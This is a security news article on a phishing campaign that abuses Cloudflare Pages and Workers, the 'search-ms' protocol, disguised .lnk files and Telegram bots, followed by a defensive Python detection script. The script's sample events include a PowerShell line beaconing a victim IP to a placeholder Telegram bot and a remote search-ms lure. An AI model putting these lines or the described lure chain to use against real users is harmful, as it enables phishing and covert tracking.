Wednesday, April 16, 2025

Hackers Exploit Cloudflare for Advanced Phishing Attacks


A sophisticated phishing campaign orchestrated by a Russian-speaking threat actor has been uncovered, revealing the abuse of Cloudflare services and Telegram for malicious purposes.

Researchers at Hunt.io have identified this new wave of attacks, which employs Cloudflare-branded phishing pages and advanced tactics to evade detection.

The campaign uses Cloudflare’s Pages.dev and Workers.dev platforms, which are normally used for legitimate static website hosting and serverless JavaScript execution, to deliver its phishing lures.


These phishing pages impersonate Digital Millennium Copyright Act (DMCA) takedown notices, pressuring victims into downloading malicious files disguised as PDFs.

Figure: Example phishing page.

The attackers exploit the “search-ms” protocol to initiate downloads of Windows shortcut (.lnk) files that trigger a malware infection chain upon execution.

Phishing Infrastructure and Infection Chain

The phishing lures direct victims to domains hosted on Cloudflare infrastructure, such as “pages.dev” and “workers.dev,” where clicking on a “Get Document” button initiates the infection process.

The malicious .lnk file, disguised as a PDF, executes a PowerShell script that downloads additional payloads from an open directory hosted on a compromised server.

These payloads include a ZIP archive containing Python-based malware together with a legitimate Python executable used to run it.

Once extracted, the malware establishes persistence by creating shortcuts in the Windows startup folder and communicates with Pyramid Command-and-Control (C2) servers.

Researchers noted incremental changes in the malware’s delivery mechanism, including obfuscation techniques to frustrate analysis.

For instance, configuration data in the Python script is now encoded with additional junk characters before being decoded.

Despite these modifications, the overall infection logic remains consistent with earlier campaigns linked to the same actor.

Telegram Integration for Enhanced Targeting

A notable evolution in this campaign is the integration of Telegram for victim tracking.

The malware uses a PowerShell script to send the external IP address of infected hosts to an attacker-operated Telegram bot.

This is achieved via hardcoded bot tokens and chat IDs embedded in the script.

The Telegram group associated with this activity, titled “ПШ КОД ЗАПУСК” (translated as “PS CODE LAUNCH”), appears to coordinate operations among several members, including an administrator and bot operator.

Figure: Screenshot from Telegram of the group tied to the malicious phishing attack.

Despite their technical sophistication, the attackers continue to exhibit operational security (OPSEC) lapses, such as leaving open directories exposed on their servers.

These directories reveal details about their infrastructure and malware components, enabling researchers to map their activities.

Over 20 domains leveraging these open directories have been identified, further exposing the scale of the operation.

This campaign underscores the abuse of trusted services like Cloudflare and Telegram by cybercriminals to mask their operations and evade detection.

The use of legitimate platforms not only lends credibility to phishing pages but also complicates efforts to identify malicious activity.

Additionally, the exploitation of protocol handlers like “search-ms” highlights gaps in endpoint monitoring that attackers continue to exploit.

Security teams are advised to monitor for signs of abuse involving Cloudflare domains and protocol handlers while remaining vigilant against open directories serving malicious payloads.
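The three behaviours the article describes, a “search-ms” lure pointing at a remote location, a PowerShell beacon to a hardcoded Telegram bot token and chat ID, and a shortcut dropped in the Windows Startup folder, can all be expressed as simple detection rules over endpoint and proxy telemetry. The script below is an added illustration of that monitoring advice, not code from Hunt.io or from the article; the event lines, hostnames, IP addresses, bot token and paths in it are constructed placeholders, not indicators from the campaign.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample telemetry (proxy log, browser URI handler log, PowerShell
# script-block log, file-creation events). Every value is a placeholder that
# stands in for the behaviours the article describes; none is a real indicator.
SAMPLE_EVENTS = [
    "proxy user=alice url=https://legit-docs.example.pages.dev/notice.html",
    "browser alice opened search-ms:query=dmca&crumb=location:\\\\203.0.113.5@80\\share&displayname=Documents",
    "psscriptblock host=WS01 text=Invoke-RestMethod -Uri 'https://api.telegram.org/bot123456789:AAHPLACEHOLDERTOKENPLACEHOLDER01/sendMessage?chat_id=-1001234567890&text=198.51.100.7'",
    "file-create host=WS01 path=C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updater.lnk",
    "browser alice opened search-ms:query=report&crumb=location:C:\\Users\\alice\\Documents",
    "file-create host=WS01 path=C:\\Users\\alice\\Desktop\\notes.txt",
]

# A search-ms: URI whose crumb=location points off the local machine.
SEARCH_MS_RE = re.compile(r"search-ms:(\S+)", re.IGNORECASE)
CRUMB_LOCATION_RE = re.compile(r"crumb=location:([^&\s]+)", re.IGNORECASE)

# Telegram Bot API URL with an embedded bot token (numeric bot id, colon, token).
TELEGRAM_BOT_RE = re.compile(
    r"api\.telegram\.org/bot(\d{6,12}):([A-Za-z0-9_-]{30,45})", re.IGNORECASE
)
CHAT_ID_RE = re.compile(r"chat_id=(-?\d+)")

# A .lnk written into the per-user Startup folder.
STARTUP_LNK_RE = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk\b", re.IGNORECASE
)


def is_remote_location(location: str) -> bool:
    """True when a search-ms crumb location is a UNC share or a web URL."""
    loc = unquote(location).strip().lower()
    return loc.startswith(("\\\\", "//", "http://", "https://"))


def scan_event(line: str) -> List[Dict[str, str]]:
    """Apply the three rules to one telemetry line and return the findings."""
    findings: List[Dict[str, str]] = []

    m = SEARCH_MS_RE.search(line)
    if m:
        crumb = CRUMB_LOCATION_RE.search(m.group(1))
        # Local searches are normal; only a remote location is suspicious.
        if crumb and is_remote_location(crumb.group(1)):
            findings.append({"rule": "search-ms-remote-location",
                             "detail": unquote(crumb.group(1))})

    m = TELEGRAM_BOT_RE.search(line)
    if m:
        chat = CHAT_ID_RE.search(line)
        # Record the bot id and chat id; the token itself is deliberately
        # left out of the finding so it is not copied into alert stores.
        findings.append({"rule": "telegram-bot-beacon",
                         "detail": f"bot_id={m.group(1)} "
                                   f"chat_id={chat.group(1) if chat else 'unknown'}"})

    m = STARTUP_LNK_RE.search(line)
    if m:
        findings.append({"rule": "startup-folder-shortcut", "detail": m.group(0)})

    return findings


def scan_events(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a batch of lines, tagging each finding with its 1-based line number."""
    results: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        for finding in scan_event(line):
            results.append({"line": number, **finding})
    return results


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"line {finding['line']}: {finding['rule']} -> {finding['detail']}")
```

Running the script against the constructed events flags the remote search-ms lure, the Telegram beacon and the Startup-folder shortcut while ignoring the ordinary Cloudflare page fetch, the local search-ms query and the plain text file. In practice the same rules map onto Sysmon file-creation events, PowerShell script-block logging (event 4104) and proxy logs; a hit on the Telegram rule is worth correlating with an outbound request to a pages.dev or workers.dev host from the same user in the preceding minutes.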

Integrating DevOps Security practices can further strengthen detection and response capabilities, especially in monitoring CI/CD pipelines and infrastructure configurations.

Enhanced scrutiny of Telegram-based communications may also aid in identifying emerging threats.

As this threat actor evolves its tactics, organizations must adapt their defenses accordingly to mitigate risks posed by increasingly sophisticated phishing campaigns.

Aman Mishra
Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
